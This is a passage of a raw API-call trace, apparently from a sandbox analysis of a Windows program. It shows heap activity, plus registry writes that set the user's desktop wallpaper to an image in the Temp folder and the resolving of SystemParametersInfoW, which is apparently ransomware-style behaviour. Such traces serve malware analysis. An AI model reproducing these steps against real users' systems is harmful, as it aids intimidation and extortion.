hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0319.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0319.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0319.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0319.679] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0319.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0319.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0319.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0319.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0319.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0319.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0319.680] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8bf858, lpdwDisposition=0x8bf874 | out: phkResult=0x8bf858*=0x294, lpdwDisposition=0x8bf874*=0x2) returned 0x0 [0319.680] RegSetValueExW (in: hKey=0x294, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", cbData=0x58 | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0319.680] RegCloseKey (hKey=0x294) returned 0x0 [0319.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0319.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0319.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0319.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0319.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0319.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0319.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0319.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0319.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0319.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0319.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0319.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0319.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0319.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0319.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0319.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0319.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0319.681] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0319.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0319.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0319.681] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0319.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0319.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0319.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0319.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18a8 [0319.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0319.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0319.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0319.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0319.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0319.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0319.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0319.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0319.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0319.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0319.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0319.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0319.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0319.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0319.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0319.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0319.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa700 [0319.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0319.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0319.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0319.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0319.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0319.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0319.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0319.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0319.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0319.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0319.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0319.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0319.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0319.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa508 [0319.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7c0 [0319.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0319.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0319.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0319.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0319.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0319.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0319.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0319.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0319.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0319.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0319.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0319.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0319.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7c0 [0319.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa508 [0319.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0319.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0319.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0319.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0319.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0319.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0319.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0319.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0319.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0319.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0319.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0319.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0319.684] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0319.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0319.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0319.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0319.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0319.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0319.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0319.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0319.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0319.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0319.685] CharUpperBuffW (in: lpsz="SSA4200F01243", cchLength=0xd | out: lpsz="SSA4200F01243") returned 0xd [0319.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0319.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0319.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0319.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0319.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0319.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0319.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0319.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0319.685] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0319.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0319.685] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0319.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0319.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0319.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0319.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0319.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0319.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0319.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0319.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0319.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0319.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0319.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0319.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0319.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0319.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0319.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0319.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0319.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0319.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0319.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0319.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0319.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0319.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0319.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0319.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0319.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0319.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0319.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0319.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0319.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0319.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0319.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0319.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0319.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0319.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0319.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0319.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0319.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0319.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0319.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0319.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0319.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0319.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0319.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0319.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0319.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0319.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0319.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0319.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0319.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0319.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0319.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0319.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0319.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0319.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0319.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0319.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0319.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0319.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0319.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0319.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0319.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0319.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0319.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0319.689] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0319.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0319.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0319.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0319.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0319.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0319.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0319.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0319.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0319.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0319.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0319.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0319.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0319.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0319.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0319.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0319.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0319.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0319.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0319.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0319.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0319.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0319.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0319.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0319.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0319.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0319.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0319.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0319.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0319.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0319.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0319.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0319.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0319.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0319.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0319.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0319.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0319.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0319.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0319.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0319.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0319.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0319.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0319.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0319.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0319.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0319.691] LoadLibraryW (lpLibFileName="user32.dll") returned 0x74f40000 [0319.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0319.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0319.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0319.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466e10 [0319.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2466e10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0319.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0319.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0319.692] HeapFree (in: 